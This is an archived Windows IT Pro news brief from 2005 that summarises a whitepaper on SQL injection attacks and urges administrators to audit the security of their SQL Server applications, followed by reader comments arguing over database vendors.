Subscribe to Windows IT Pro
January 06, 2005 12:00 AM

SQL Injection Attacks by Example

M Edwards
Windows IT Pro
InstantDoc ID #45023
Rating: (5)
If you use SQL Server as a backend for you applications then have you protected against injection attacks? Such attacks can inject code into SQL statements that might lead to the inadvertant exposure of sensitive information, or in a worst case scenario might lead to a total system and/or network compromise.

Steve Friedl recently released a whitepaper, "SQL Injection Attacks by Example," which discusses the steps he took during a recent security audit to penetrate a customer's system. The paper describes how he discovered what services and technologies were used, how he discovered table names and table field names, and how he coaxed the system into changing an email address in a table to recover a valid login account name and password.

The paper also discusses some ways to mitigate such attacks. However, if you're interested then you should read the related message thread on the Bugtraq mailing list to see what other people had to say about Friedl's mitigation suggestions before you rely on them as definitive defensive measures.

As we reported yesterday in the story, "Microsoft WINS and SQL Server Targeted," brute force password cracking attempts have recently been detected against Microsoft SQL Server. While such cracking attempts are one way to find SQL Server login passwords, injection attacks are another method that could be launched by anyone from anywhere in the world if your database servers are exposed to the Internet as backends for Web-based applications. So consider auditing the security of your SQL-based applications and the related systems' overall network exposure to make sure you have your bases covered adequately.

Related Content:

ARTICLE TOOLS

Comments
Add A Comment
  • sujan
    7 months ago
    Oct 25, 2011

    sql injection step by step practicle guide
    www.readyproject.in/sqlInjection/

  • Anonymous User
    7 years ago
    Jan 19, 2005

    -->Don't use SQL Server or any other MS product for that matter

    real developers choose the best tool for the job while wanna be developers choose 'my database' or 'my language'.

  • Anonymous User
    7 years ago
    Jan 17, 2005

    sql was always blessed with good looks, oracle needs a makeover, send forth the Fab 5 ;-)

  • Anonymous User
    7 years ago
    Jan 13, 2005

    well done genius - this applies to all SQL servers, nothing to do with MS specific

  • Anonymous User
    7 years ago
    Jan 13, 2005

    You mean use Oracle, which also admits it is liable for these attacks?

You must log on before posting a comment.

Are you a new visitor? Register Here

advertisement

advertisement

Dev Pro Left-Brain SharePoint Pro SQL Server Pro SuperSite for Windows Windows IT Pro

© 2012 Penton Media, Inc.

Home About Us Advertise Customer Service Privacy Statement Subscribe/Renew Terms Of Use

Windows is a trademark of the Microsoft group of companies. Windows IT Pro is used by Penton Media Inc. under license from owner.